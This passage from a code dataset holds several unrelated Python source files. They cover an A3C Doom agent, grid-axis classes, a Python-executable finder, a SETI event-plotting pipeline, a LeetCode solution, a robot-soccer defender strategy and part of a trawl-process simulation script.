rollout[:,1]\n rewards = rollout[:,2]\n next_observations = rollout[:,3]\n values = rollout[:,5]\n\n self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])\n discounted_rewards = discount(self.rewards_plus, gamma)[:-1]\n self.value_plus = np.asarray(values.tolist() + [bootstrap_value])\n advantages = rewards + gamma*self.value_plus[1:] - self.value_plus[:-1]\n advantages = discount(advantages , gamma)\n\n feed_dict = {self.localac.target_v: discounted_rewards,\n self.localac.inputs: np.vstack(observations),\n self.localac.actions: actions,\n self.localac.advantages: advantages,\n self.localac.state_in[0]: self.batch_rnn_state[0],\n self.localac.state_in[1]: self.batch_rnn_state[1]}\n value_loss, policy_loss, entropy, grad_norms, var_norms, self.batch_rnn_state, _ = sess.run(\n [self.localac.value_loss,\n self.localac.policy_loss,\n self.localac.entropy,\n self.localac.grad_norms,\n self.localac.var_norms,\n self.localac.state_out,\n self.localac.apply_grads],\n feed_dict = feed_dict) \n return value_loss / len(rollout), policy_loss / len(rollout), entropy / len(rollout), grad_norms, var_norms\n\n def work(self, max_episode_length, gamma, sess, coord, saver):\n episode_count = sess.run(self.global_episodes)\n total_steps = 0\n print(\"Starting worker \" + str(self.number))\n with sess.as_default(), sess.graph.as_default():\n while not coord.should_stop():\n sess.run(self.update_local_ops)\n episode_buffer = []\n episode_values = []\n episode_frames = []\n episode_reward = 0\n episode_step_count = 0\n d = False\n\n self.env.new_episode()\n s = self.env.get_state().screen_buffer\n episode_frames.append(s)\n s = process_frame(s)\n rnn_state = self.localac.state_init\n self.batch_rnn_state = rnn_state\n while self.env.is_episode_finished() == False:\n a_dist, v, rnn_state = sess.run([self.localac.policy, self.localac.value, self.localac.state_out],\n feed_dict = {self.localac.inputs: [s],\n self.localac.state_in[0]: rnn_state[0],\n self.localac.state_in[1]: rnn_state[1]})\n a = np.random.choice(a_dist[0], p=a_dist[0])\n a = np.argmax(a_dist == a)\n\n r = self.env.make_action(self.actions[a]) / 100.0\n d = self.env.is_episode_finished()\n if d == False:\n s1 = self.env.get_state().screen_buffer\n episode_frames.append(s1)\n s1 = process_frame(s1)\n else: \n s1 = s\n\n episode_buffer.append([s, a, r, s1, d, v[0,0]])\n episode_values.append(v[0,0])\n\n episode_reward += r\n s = s1\n total_steps += 1\n episode_step_count += 1\n\n if len(episode_buffer) == 30 and d != True and episode_step_count != max_episode_length - 1:\n v1 = sess.run(self.localac.value,\n feed_dict = {self.localac.inputs: [s],\n self.localac.state_in[0]: rnn_state[0],\n self.localac.state_in[1]: rnn_state[1]})[0, 0]\n value_loss, policy_loss, entropy, grad_norms, var_norms = self.train(episode_buffer,\n sess,\n gamma,\n v1)\n episode_buffer = []\n sess.run(self.update_local_ops)\n if d == True:\n break\n\n self.episode_rewards.append(episode_reward)\n self.episode_lengths.append(episode_step_count)\n self.episode_mean_values.append(np.mean(episode_values))\n\n if len(episode_buffer) != 0:\n value_loss, policy_loss, entropy, grad_norms, var_norms = self.train(episode_buffer, \n sess,\n gamma,\n 0.0)\n\n if episode_count % 5 == 0 and episode_count != 0:\n if self.name == 'worker_0' and episode_count % 25 == 0:\n time_per_step = 0.05\n images = np.array(episode_frames)\n make_gif(images, './frames/image'+str(episode_count)+'.gif',\n duration=len(images)*time_per_step, true_image=True, salience=False)\n if episode_count % 250 == 0 and self.name == 'worker_0':\n saver.save(sess, self.model_path+'/model-'+str(episode_count)+'.cptk')\n print(\"Saved model\")\n\n mean_reward = np.mean(self.episode_rewards[-5:])\n mean_length = np.mean(self.episode_lengths[-5:])\n mean_value = np.mean(self.episode_mean_values[-5:])\n summary = tf.Summary()\n summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))\n summary.value.add(tag='Perf/Length', simple_value=float(mean_length))\n summary.value.add(tag='Perf/Value', simple_value=float(mean_value))\n summary.value.add(tag='Losses/Value Loss', simple_value=float(value_loss))\n summary.value.add(tag='Losses/Policy Loss', simple_value=float(policy_loss))\n summary.value.add(tag='Losses/Entropy', simple_value=float(entropy))\n summary.value.add(tag='Losses/Grad Norm', simple_value=float(grad_norms))\n summary.value.add(tag='Losses/Var Norm', simple_value=float(var_norms))\n self.summary_writer.add_summary(summary, episode_count)\n self.summary_writer.flush()\n\n if self.name == 'worker_0':\n sess.run(self.increment)\n episode_count += 1\n\nmax_episode_length = 300\ngamma = 0.99\ns_size = 7056\na_size = 3\nload_model = False\nmodel_path = './model'\n\ntf.reset_default_graph()\n\nif not os.path.exists(model_path):\n os.makedirs(model_path)\n\nwith tf.device(\"/cpu:0\"):\n global_episodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)\n trainer = tf.train.AdamOptimizer(learning_rate=0.1)\n master_network = ACNetwork(s_size, a_size, 'global', None)\n num_workers = multiprocessing.cpu_count()\n workers = []\n\n for i in range(num_workers):\n workers.append(Worker(DoomGame(), i, s_size, a_size, trainer, model_path, global_episodes))\n saver = tf.train.Saver(max_to_keep=5)\n\nwith tf.Session() as sess:\n coord = tf.train.Coordinator()\n if load_model == True:\n print(\"Loading model...\")\n ckpt = tf.train.get_checkpoint_state(model_path)\n saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n sess.run(tf.global_variables_initializer())\n\n worker_threads = []\n for worker in workers:\n worker_work = lambda: worker.work(max_episode_length, gamma, sess, coord, saver)\n t = threading.Thread(target=(worker_work))\n t.start()\n sleep(0.5)\n worker_threads.append(t)\n coord.join(worker_threads)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"101494962","text":"# -*- coding: utf-8 -*-\nfrom typing import Any\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport numpy as np\n\nfrom .types import AxisType\nfrom .types import GridAxisType\nfrom .types import is_basic_indexing\nfrom .utils.formatting import make_identifiable\n\n\ndef _log_axis(\n min_: Union[float, np.ndarray], max_: Union[float, np.ndarray], points: int\n) -> np.ndarray:\n \"\"\"Generates logarithmically spaced axis/array.\n\n Returns always an array with the shape (points,) + np.shape(min/max) and\n a floating dtype.\n \"\"\"\n if np.issubdtype(\n # min_\n type(min_) if not isinstance(min_, np.ndarray) else min_.dtype,\n np.floating,\n ) or np.issubdtype(\n # max_\n type(max_) if not isinstance(max_, np.ndarray) else max_.dtype,\n np.floating,\n ):\n dtype = None\n else:\n dtype = float\n\n return np.logspace(np.log10(min_), np.log10(max_), points, dtype=dtype)\n\n\ndef _lin_axis(\n min_: Union[float, np.ndarray], max_: Union[float, np.ndarray], points: int\n) -> np.ndarray:\n \"\"\"Generates linearly spaced axis/array.\n\n Returns always an array with the shape (points,) + np.shape(min/max) and\n a floating dtype.\n \"\"\"\n if np.issubdtype(\n # min_\n type(min_) if not isinstance(min_, np.ndarray) else min_.dtype,\n np.floating,\n ) or np.issubdtype(\n # max_\n type(max_) if not isinstance(max_, np.ndarray) else max_.dtype,\n np.floating,\n ):\n dtype = None\n else:\n dtype = float\n\n return np.linspace(min_, max_, points, dtype=dtype)\n\n\nclass Axis:\n def __init__(\n self,\n data: np.ndarray,\n *,\n name: str = \"unnamed\",\n label: str = \"\",\n unit: str = \"\",\n ):\n if not isinstance(data, np.ndarray):\n data = np.asanyarray(data)\n\n self._data = data if data.ndim > 0 else data[np.newaxis]\n\n name = make_identifiable(name)\n self._name = name if name else \"unnamed\"\n self._label = label\n self._unit = unit\n\n def __repr__(self) -> str:\n repr_ = f\"{self.__class__.__name__}(\"\n repr_ += f\"name='{self.name}', \"\n repr_ += f\"label='{self.label}', \"\n repr_ += f\"unit='{self.unit}', \"\n repr_ += f\"axis_dim={self.axis_dim}, \"\n repr_ += f\"len={len(self)}\"\n repr_ += \")\"\n\n return repr_\n\n def __len__(self) -> int:\n return len(self._data)\n\n def __iter__(self) -> \"Axis\":\n for d in self._data:\n yield self.__class__(\n d[np.newaxis], name=self.name, label=self.label, unit=self.unit,\n )\n\n def __getitem__(\n self, key: Union[int, slice, Tuple[Union[int, slice]]]\n ) -> \"Axis\":\n if not is_basic_indexing(key):\n raise IndexError(\"Only basic indexing is supported!\")\n\n key = np.index_exp[key]\n requires_new_axis = False\n\n # > determine if axis extension is required\n # 1st index (temporal slicing) not hidden if ndim == axis_dim + 1\n # or alternatively -> check len of the axis -> number of temporal slices\n if len(self) != 1:\n # revert dimensionality reduction\n if isinstance(key[0], int):\n requires_new_axis = True\n else:\n requires_new_axis = True\n\n data = self.data[key]\n\n if requires_new_axis:\n data = data[np.newaxis]\n\n return self.__class__(\n data, name=self.name, label=self.label, unit=self.unit,\n )\n\n def __setitem__(\n self, key: Union[int, slice, Tuple[Union[int, slice]]], value: Any\n ) -> None:\n self.data[key] = value\n\n def __array__(self, dtype: Optional[np.dtype] = None) -> np.ndarray:\n data = self._data.astype(dtype) if dtype else self._data\n return np.squeeze(data, axis=0) if len(self) == 1 else data\n\n @property\n def data(self) -> np.ndarray:\n return np.asanyarray(self)\n\n @data.setter\n def data(self, value: Union[np.ndarray, Any]) -> None:\n new = np.broadcast_to(value, self.shape, subok=True)\n if len(self) == 1:\n self._data = np.array(new, subok=True)[np.newaxis]\n else:\n self._data = np.array(new, subok=True)\n\n @property\n def axis_dim(self):\n return self._data.ndim - 1\n\n @property\n def shape(self):\n return self._data.shape[1:] if len(self) == 1 else self._data.shape\n\n @property\n def dtype(self):\n return self._data.dtype\n\n @property\n def ndim(self):\n return (self._data.ndim - 1) if len(self) == 1 else self._data.ndim\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, value):\n parsed_value = make_identifiable(str(value))\n if not parsed_value:\n raise ValueError(\n \"Invalid name provided! Has to be able to be valid code\"\n )\n self._name = parsed_value\n\n @property\n def label(self):\n return self._label\n\n @label.setter\n def label(self, value):\n value = str(value)\n self._label = value\n\n @property\n def unit(self):\n return self._unit\n\n @unit.setter\n def unit(self, value):\n value = str(value)\n self._unit = value\n\n def equivalent(self, other: Union[Any, AxisType]) -> bool:\n if not isinstance(other, self.__class__):\n return False\n\n if self.axis_dim != other.axis_dim:\n return False\n\n if self.name != other.name:\n return False\n\n if self.label != other.label:\n return False\n\n if self.unit != other.unit:\n return False\n\n return True\n\n def append(self, other: \"Axis\") -> \"Axis\":\n if not isinstance(other, self.__class__):\n raise TypeError(f\"Can not append '{other}' to '{self}'\")\n\n if not self.equivalent(other):\n raise ValueError(\n f\"Mismatch in attributes between '{self}' and '{other}'\"\n )\n\n selfdata = (\n self.data[np.newaxis] if self.ndim == self.axis_dim else self.data\n )\n\n otherdata = (\n other.data[np.newaxis]\n if other.ndim == other.axis_dim\n else other.data\n )\n\n self._data = np.append(selfdata, otherdata, axis=0)\n\n\n_ignored_if_data = object()\n\n\nclass GridAxis(Axis):\n _supported_axis_types: Tuple[str, ...] = (\n \"lin\",\n \"linear\",\n \"log\",\n \"logarithmic\",\n \"custom\",\n )\n\n def __init__(\n self,\n data: np.ndarray,\n *,\n axis_type: str = \"linear\",\n name: str = \"unnamed\",\n label: str = \"\",\n unit: str = \"\",\n ) -> None:\n if axis_type not in self._supported_axis_types:\n raise ValueError(\n f\"'{axis_type}' is not supported for axis_type! \"\n + f\"It has to by one of {self._supported_axis_types}\"\n )\n\n super().__init__(data, name=name, label=label, unit=unit)\n self._axis_type = axis_type\n\n def __iter__(self) -> \"GridAxis\":\n for d in self._data:\n yield self.__class__(\n d[np.newaxis],\n name=self.name,\n label=self.label,\n unit=self.unit,\n axis_type=self.axis_type,\n )\n\n def __getitem__(\n self, key: Union[int, slice, Tuple[Union[int, slice]]]\n ) -> \"GridAxis\":\n if not is_basic_indexing(key):\n raise IndexError(\"Only basic indexing is supported!\")\n\n key = np.index_exp[key]\n requires_new_axis = False\n\n # first index corresponds to temporal slicing if ndim == axis_dim + 1\n # or alternatively -> check len of the axis -> number of temporal slices\n if len(self) != 1:\n # revert dimensionality reduction\n if isinstance(key[0], int):\n requires_new_axis = True\n else:\n requires_new_axis = True\n\n return self.__class__(\n self.data[key][np.newaxis] if requires_new_axis else self.data[key],\n name=self.name,\n label=self.label,\n unit=self.unit,\n axis_type=self.axis_type,\n )\n\n def __repr__(self) -> str:\n repr_ = f\"{self.__class__.__name__}(\"\n repr_ += f\"name='{self.name}', \"\n repr_ += f\"label='{self.label}', \"\n repr_ += f\"unit='{self.unit}', \"\n repr_ += f\"axis_type={self.axis_type}, \"\n repr_ += f\"axis_dim={self.axis_dim}, \"\n repr_ += f\"len={len(self)}\"\n repr_ += \")\"\n\n return repr_\n\n @property\n def axis_type(self) -> str:\n return self._axis_type\n\n @axis_type.setter\n def axis_type(self, value: str) -> None:\n value = str(value)\n if value not in self._supported_axis_types:\n raise ValueError(\n f\"'{value}' is not supported for axis_type! \"\n + f\"It has to by one of {self._supported_axis_types}\"\n )\n self._axis_type = value\n\n @classmethod\n def from_limits(\n cls,\n min_value: Union[np.ndarray, int, float],\n max_value: Union[np.ndarray, int, float],\n cells: int,\n *,\n axis_type: str = \"linear\",\n name: str = \"unnamed\",\n label: str = \"\",\n unit: str = \"\",\n ) -> \"GridAxis\":\n if axis_type in (\"lin\", \"linear\"):\n axis: np.ndarray = _lin_axis(min_value, max_value, cells)\n elif axis_type in (\"log\", \"logarithmic\"):\n axis: np.ndarray = _log_axis(min_value, max_value, cells)\n else:\n raise ValueError(\n \"Invalid axis type provided. \"\n + \"Only 'lin', 'linear', 'log', and 'logarithmic' \"\n + \"are supported!\"\n )\n\n if axis.ndim == 1:\n axis = axis[np.newaxis]\n\n axis = cls(axis, name=name, label=label, unit=unit)\n axis._axis_type = axis_type\n return axis\n\n def equivalent(self, other: Union[Any, GridAxisType]) -> bool:\n if not super().equivalent(other):\n return False\n\n if self.axis_type != other.axis_type:\n return False\n\n return True\n","sub_path":"nata/axes.py","file_name":"axes.py","file_ext":"py","file_size_in_byte":10254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49248149","text":"import os\nimport pathlib\nimport re\n\nimport click\nimport pythonfinder\n\n\ndef find_by_version(val):\n finder = pythonfinder.Finder()\n return finder.find_python_version(val)\n\n\ndef find_in_system_path(val):\n choices = [val]\n if 'PATHEXT' in os.environ:\n choices += [\n f'{val}{ext}'\n for ext in os.environ['PATHEXT'].split(os.pathsep)\n ]\n for choice in choices:\n for path in os.environ['PATH'].split(os.pathsep):\n full_path = pathlib.Path(path, choice)\n if full_path.is_file():\n return full_path.resolve()\n return None\n\n\nclass PythonExecutablePath(click.Path):\n \"\"\"A path that also checks PATH for Python executables.\n \"\"\"\n def __init__(self, **kwargs):\n super().__init__(exists=True, dir_okay=False, file_okay=True, **kwargs)\n\n def convert(self, val, param, ctx):\n if re.match(r'^(\\d+)(?:\\.(\\d+))?$', val):\n # This looks like a Python version. Try to find it.\n entry = find_by_version(val)\n if entry and entry.path:\n val = str(entry.path.resolve())\n if 'PATH' in os.environ and os.path.sep not in val and '/' not in val:\n # This looks like a command. Try to resolve it before checking.\n path = find_in_system_path(val)\n if path:\n val = str(path.resolve())\n return super().convert(val, param, ctx)\n","sub_path":"src/pent/_click.py","file_name":"_click.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"627305914","text":"#!/usr/bin/env python3\n\nr\"\"\"\nFront-facing script to plot drifting, narrowband events in a set of generalized\ncadences of ON-OFF radio SETI observations.\n\"\"\"\n\nimport os\nfrom operator import attrgetter\nimport pandas\nfrom blimpy import Waterfall\nfrom . import plot_event\n\n\nclass PathRecord:\n r''' Definition of an H5 path record '''\n def __init__(self, path_h5, tstart, source_name):\n self.path_h5 = path_h5\n self.tstart = tstart\n self.source_name = source_name\n def __repr__(self):\n return repr((self.path_h5, self.tstart, self.source_name))\n\n\ndef plot_event_pipeline(event_csv_string, fils_list_string, user_validation=False,\n offset=0, filter_spec=None, sortby_tstart=True, plot_dir=None):\n r\"\"\"\n This function calls :func:`~turbo_seti.find_event.plot_event.plot_candidate_events` to\n plot the events in an output .csv file generated by find_event_pipeline.py\n\n Parameters\n ----------\n event_csv_string : str\n The string name of a .csv file that contains the\n list of events at a given filter level, created as\n output from find_event_pipeline.py. The\n .csv should have a filename containing information\n about its parameters, for example\n \"kepler1093b_0015_f2_snr10.csv\"\n Remember that the file was created with some cadence\n (ex. ABACAD) and ensure that the cadence matches the\n order of the files in fils_list_string\n\n fils_list_string : str\n The string name of a plaintext file ending in .lst\n that contains the filenames of .fil files, each on a\n new line, that corresponds to the cadence used to\n create the .csv file used for event_csv_string.\n\n user_validation : bool, optional\n A True/False flag that, when set to True, asks if the\n user wishes to continue with their input parameters\n (and requires a 'y' or 'n' typed as confirmation)\n before beginning to run the program. Recommended when\n first learning the program, not recommended for\n automated scripts.\n\n offset : int, optional\n The amount that the overdrawn \"best guess\" line from\n the event parameters in the csv should be shifted from\n its original position to enhance readability. Can be\n set to 0 (default; draws line on top of estimated\n event) or 'auto' (shifts line to the left by an auto-\n calculated amount, with addition lines showing original\n position).\n sortby_tstart : bool\n If True, the input file list is sorted by header.tstart.\n\n Examples\n --------\n >>> import plot_event_pipeline;\n ... plot_event_pipeline.plot_event_pipeline(event_csv_string, fils_list_string,\n ... user_validation=False, offset=0)\n\n \"\"\"\n #reading in the .csv containing the events\n try:\n candidate_event_dataframe = pandas.read_csv(event_csv_string, comment='#')\n print(\"plot_event_pipeline: Opened file {}\".format(event_csv_string))\n except:\n print(\"*** plot_event_pipeline: Oops, cannot access file {}\".format(event_csv_string))\n return\n\n fil_file_list = []\n for file in pandas.read_csv(fils_list_string, encoding='utf-8', header=None, chunksize=1):\n fil_file_list.append(file.iloc[0,0])\n\n #obtaining source names\n source_name_list = []\n path_record = []\n for fil in fil_file_list:\n wf = Waterfall(fil, load_data=False)\n source_name = wf.container.header[\"source_name\"]\n source_name_list.append(source_name)\n tstart = wf.container.header[\"tstart\"]\n path_record.append(PathRecord(fil, tstart, source_name))\n\n # If sorting by header.tstart, then rewrite the dat_file_list in header.tstart order.\n if sortby_tstart:\n path_record = sorted(path_record, key=attrgetter('tstart'))\n fil_file_list = []\n for obj in path_record:\n fil_file_list.append(obj.path_h5)\n print(\"plot_event_pipeline: file = {}, tstart = {}, source_name = {}\"\n .format(os.path.basename(obj.path_h5), obj.tstart, obj.source_name))\n else:\n for obj in path_record:\n print(\"plot_event_pipeline: file = {}, tstart = {}, source_name = {}\"\n .format(os.path.basename(obj.path_h5), obj.tstart, obj.source_name))\n\n #get rid of bytestring \"B'\"s if they're there (early versions of\n #seti_event.py added \"B'\"s to all of the source names)\n on_source_name_original = candidate_event_dataframe.Source[0]\n if on_source_name_original[0] == 'B' and on_source_name_original[-1] == '\\'':\n on_source_name = on_source_name_original[2:-2]\n else:\n on_source_name = on_source_name_original\n candidate_event_dataframe = candidate_event_dataframe.replace(to_replace=on_source_name_original,\n value=on_source_name)\n\n # Establish filter-level from filter_spec (preferred)\n # or 3rd token of the .csv path (don't break an existing caller)\n if filter_spec is None:\n filter_level = event_csv_string.split('_')[2]\n else:\n filter_level = filter_spec\n\n #begin user validation\n print(\"Plotting some events for: \", on_source_name)\n print(\"There are \" + str(len(candidate_event_dataframe.Source)) + \" total events in the csv file \" + event_csv_string)\n print(\"therefore, you are about to make \" + str(len(candidate_event_dataframe.Source)) + \" .png files.\")\n\n if user_validation:\n question = \"Do you wish to proceed with these settings?\"\n while \"the answer is invalid\":\n reply = str(input(question+' (y/n): ')).lower().strip()\n if reply == '':\n return\n if reply[0] == 'y':\n break\n if reply[0] == 'n':\n return\n\n #move to plot_event.py for the actual plotting\n plot_event.plot_candidate_events(candidate_event_dataframe,\n fil_file_list,\n filter_level,\n source_name_list,\n offset=offset,\n plot_dir=plot_dir)\n","sub_path":"turbo_seti/find_event/plot_event_pipeline.py","file_name":"plot_event_pipeline.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"495073968","text":"'''\n Solution to LeetCodeOJ Problem 3\n Copyright (c) Anthony Chan. All rights reserved.\n\n https://github.com/anthonyc1/LeetCodeOJ\n'''\n\nclass Solution:\n\tdef lengthOfLongestSubstring(self, s):\n\t\tstart = longest = 0\n\t\tseenChars = {}\n\n\t\tfor i in range(len(s)):\n\t\t\tif s[i] in seenChars and start <= seenChars[s[i]]:\n\t\t\t\tstart = seenChars[s[i]] + 1\n\t\t\telse:\n\t\t\t\tlongest = max(longest, i - start + 1)\n\t\t\tseenChars[s[i]] = i\n\t\treturn longest\n\n# sol = Solution()\n# print sol.lengthOfLongestSubstring(\"fjskjflakdjfslidfj\")","sub_path":"medium/python/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"329448027","text":"import math\nimport algorithms\nimport controller\nimport numpy as np\nfrom strategy.BaseStrategy import Strategy\nfrom strategy.DebugTools import DebugPotentialFieldStrategy\n \nclass Defender(Strategy):\n def __init__(self, match, side, plot_field=False):\n super().__init__(match, side+\"Defender\", controller=controller.TwoSidesLQR)\n self.name = side+\"Defender\"\n \n def start(self, robot=None):\n super().start(robot=robot)\n\n self.sobra = algorithms.fields.PotentialField(self.match, name=\"SobraBehaviour\")\n\n self.project = algorithms.fields.PotentialField(self.match, name=\"ProjectBehaviour\")\n\n self.path = algorithms.fields.PotentialField(self.match, name=\"PathBehaviour\")\n \n self.kalm = algorithms.fields.PotentialField(self.match, name=\"KalmBehaviour\")\n \n self.right_redeploy = algorithms.fields.PotentialField(self.match, name=\"RightRedeployBehaviour\")\n \n self.left_redeploy = algorithms.fields.PotentialField(self.match, name=\"LeftRedeployBehaviour\") \n \n #small area x, y, width and height\n self.sa_x, self.sa_y, self.sa_w, self.sa_h = self.match.game.field.get_small_area(\"defensive\")\n \n self.field_w, self.field_h = self.match.game.field.get_dimensions()\n\n self.x = self.sa_w + 0.075\n \n #trave superior do gol\n g_hgr = (self.field_h/2)+0.2-0.0375\n sa_hgr = self.field_h/2 + self.sa_h/2\n ga_hgr = self.field_h/2 + 0.4\n \n #trave inferior do gol\n g_lwr = (self.field_h/2)-0.2+0.0375\n sa_lwr = self.field_h/2 - self.sa_h/2\n ga_lwr = self.field_h/2 - 0.4\n\n def side_verifier(y):\n d = 0.05\n\n if self.name == \"LeftDefender\":\n y += d\n elif self.name == \"RightDefender\":\n y -= d\n return y\n\n def follow_ball(m):\n if m.ball.y > g_hgr:\n y = side_verifier(g_hgr)\n return (self.x, y)\n elif m.ball.y < g_lwr:\n y = side_verifier(g_lwr)\n return (self.x, y)\n else:\n y = side_verifier(m.ball.y)\n return (self.x, y)\n\n self.project.add_field(\n algorithms.fields.LineField(\n self.match,\n target = follow_ball,\n theta = 0,\n line_size = self.field_h - self.sa_w,\n line_dist = 0.1,\n line_dist_max = 0.7,\n multiplier = 0.7,\n decay = lambda x : x\n )\n )\n \n def get_mid_value(a, b, c):\n return max(min(a,b), min(max(a,b),c))\n\n #retorna a posição em que o campo deve ser criado, para que a bola seja defendida\n def get_def_spot(m):\n x = self.x\n \n if m.ball.vx == 0:\n if m.ball.y > g_hgr:\n y = side_verifier(g_hgr)\n return (x, y)\n elif m.ball.y < g_lwr:\n y = side_verifier(g_lwr)\n return (x, y)\n else:\n y = side_verifier(m.ball.y)\n return (x, y)\n\n if m.ball.y > ga_hgr:\n y = side_verifier(g_hgr)\n return (x, y)\n elif m.ball.y < ga_lwr:\n y = side_verifier(g_lwr)\n return (x, y)\n else:\n if m.ball.x > 0.4:\n gk_y = self.match.robots[0].y\n\n if self.name == \"RightDefender\":\n gk_inf = gk_y-0.075/2\n m_inf = (gk_inf+g_lwr)/2\n y = ( (m.ball.y-m_inf)/m.ball.x)*x + m_inf\n y = get_mid_value(y, side_verifier(g_lwr), side_verifier(g_hgr))\n return (x, y)\n elif self.name == \"LeftDefender\":\n gk_sup = gk_y+0.075/2\n m_sup = (gk_sup+g_hgr)/2\n y = ( (m.ball.y-m_sup)/m.ball.x)*x + m_sup\n y = get_mid_value(y, side_verifier(g_lwr), side_verifier(g_hgr))\n return (x, y)\n\n y = ( (m.ball.y-(self.field_h/2) )/m.ball.x)*x + self.field_h/2\n y = get_mid_value(side_verifier(y), side_verifier(g_lwr), side_verifier(g_hgr))\n return (x, y)\n\n def sobra(m):\n x = m.ball.x-0.8\n if m.ball.x < self.robot.x and m.ball.vx > 0:\n if m.ball.y > self.field_h/2:\n y = m.ball.y - 0.3\n else:\n y = m.ball.y + 0.3\n else:\n if m.ball.y > self.field_h/2:\n y = self.field_h/2 + 0.55\n else:\n y = self.field_h/2 - 0.55\n \n if self.field_h - y < 0.04:\n y = self.field_h - 0.04\n elif y < 0.04:\n y = 0.04\n\n return x,y\n \n self.path.add_field(\n algorithms.fields.LineField(\n self.match,\n target = get_def_spot,\n theta = 0,\n line_size = self.field_h - self.sa_w,\n line_dist = 0.1,\n line_dist_max = self.field_h,\n multiplier = 0.7,\n decay = lambda x : x\n )\n )\n \n #permanece no centro da área\n self.kalm.add_field(\n algorithms.fields.LineField(\n self.match,\n target = lambda m: (self.x, side_verifier(self.field_h/2)),\n theta = 0,\n line_size = self.field_h - self.sa_w,\n line_dist = 0.1,\n line_dist_max = self.field_h/2,\n decay = lambda x: x,\n multiplier = 0.7,\n )\n )\n \n self.left_redeploy.add_field(\n algorithms.fields.TangentialField(\n self.match,\n target = (self.sa_w+0.0375, self.sa_h+self.sa_y - 0.07),\n radius = 0,\n radius_max = self.field_w,\n clockwise = False,\n decay = lambda x: 1,\n multiplier = 0.7\n )\n )\n\n self.right_redeploy.add_field(\n algorithms.fields.TangentialField(\n self.match,\n target = (self.sa_w+0.0375, self.sa_y + 0.07),\n radius = 0,\n radius_max = self.field_w,\n clockwise = True,\n decay = lambda x: 1,\n multiplier = 0.7\n )\n )\n\n self.sobra.add_field(\n algorithms.fields.PointField(\n self.match,\n target = sobra,\n radius = 0.1,\n multiplier = 0.7,\n decay = lambda x : x**6\n )\n )\n\n \n def decide(self):\n \n self.theta = self.robot.theta\n self.maneuver = \"yep\"\n behaviour = None\n self.behaviour = None\n\n if self.match.ball.x < self.field_w/2 + 0.2:\n if (self.robot.x >= self.sa_w+0.01) and (self.robot.x < self.sa_w + 0.045):\n \n if self.match.ball.x > 0.225 and self.match.ball.x < self.field_w/2 + 0.3:\n behaviour = self.path\n elif self.match.ball.x <= 0.225:\n behaviour = self.project\n else:\n behaviour = self.kalm\n \n else:\n if self.name == \"LeftDefender\":\n behaviour = self.left_redeploy\n else:\n behaviour = self.right_redeploy\n else:\n if self.name == \"LeftDefender\":\n self.maneuver = \"nope\"\n behaviour = self.sobra\n else:\n behaviour = self.kalm\n \n return behaviour.compute([self.robot.x, self.robot.y])\n\n def spin(self):\n if self.match.team_color.upper() == \"BLUE\":\n w = ((self.theta**2)**0.5 - 1.5708) * 20\n else:\n w = ((((self.theta**2)**0.5 - 4.71239)**2)**0.5) * 15\n return -w, w\n \n def spinning_time(self):\n if self.maneuver == \"yep\":\n if (self.robot.x > self.sa_w+0.01 and self.robot.x < self.sa_w + 0.04):\n if self.match.team_color.upper() == \"BLUE\":\n if ((self.theta >= -1.61 and self.theta <= -1.54) or (self.theta >= 1.54 and self.theta <= 1.61)):\n return False\n else:\n return True\n else:\n theta = self.theta*180/math.pi\n if ((theta >= 87 and theta <= 93) or (theta >= 267 and theta <= 273)):\n return False\n else:\n return True\n else:\n return False\n else:\n return False\n\n def update(self):\n if self.spinning_time():\n return self.spin()\n return self.controller.update()","sub_path":"strategy/tests/Defender.py","file_name":"Defender.py","file_ext":"py","file_size_in_byte":9177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555960365","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 24 19:00:51 2022\n\n@author: dleon\n\"\"\"\nimport numpy as np\nfrom scipy.stats import cauchy\nfrom scipy.integrate import quad\nfrom ambit_stochastics.helpers.alternative_convolution_implementation import cumulative_and_diagonal_sums\n\n#def kernel(x_bar,t_bar):\n# return 1+ t_bar * 0.1\n \ndef kernel(t_bar):\n return np.sin(t_bar)\n \ndef x_integral(a,b):\n #return (b+b**1.5/1.5) - (a + a **1.5/1.5) \n return b-a\n \nif __name__ == '__main__':\n np.random.seed(3)\n tau = 0.5; k = 250 \n nr_trawls = k\n times = np.arange(tau, (nr_trawls+1) * tau, tau)\n max_nr_rows = k\n #trawl_function\n lambda_ = 1;\n trawl_function = lambda t : lambda_ * np.exp(t * lambda_) * (t<=0)\n #gaussian params L'~ N(mu,sigma**2)\n cauchy_scale = 0.1\n slice_matrix = np.zeros([min(nr_trawls,max_nr_rows-1),nr_trawls])\n \n\n \n for j in range(nr_trawls):\n if j %50 == 0:\n print(j)\n for i in range(min(nr_trawls,max_nr_rows-1)):\n\n if j==0: \n a = -np.inf\n else: \n a = j * tau\n b = (j+1) * tau \n \n if i+j+1 == nr_trawls:\n #gfun = 0\n #hfun = lambda t_bar : trawl_function(t_bar - k * tau)\n l_bound = 0\n h_bound = lambda t_bar: trawl_function(t_bar - k * tau)\n \n #func_to_integrate = lambda t_bar : x_integral(l_bound,h_bound(t_bar)) * (1+ np.sin(t_bar)) \n func_to_integrate = lambda t_bar : np.abs(x_integral(l_bound,h_bound(t_bar)) * kernel(t_bar)) \n\n \n \n \n else:\n #gfun = lambda t_bar : trawl_function(t_bar - (i+j+2)*tau)\n #hfun = lambda t_bar : trawl_function(t_bar - (i+j+1)*tau)\n l_bound = lambda t_bar: trawl_function(t_bar - (i+j+2)*tau)\n h_bound = lambda t_bar: trawl_function(t_bar - 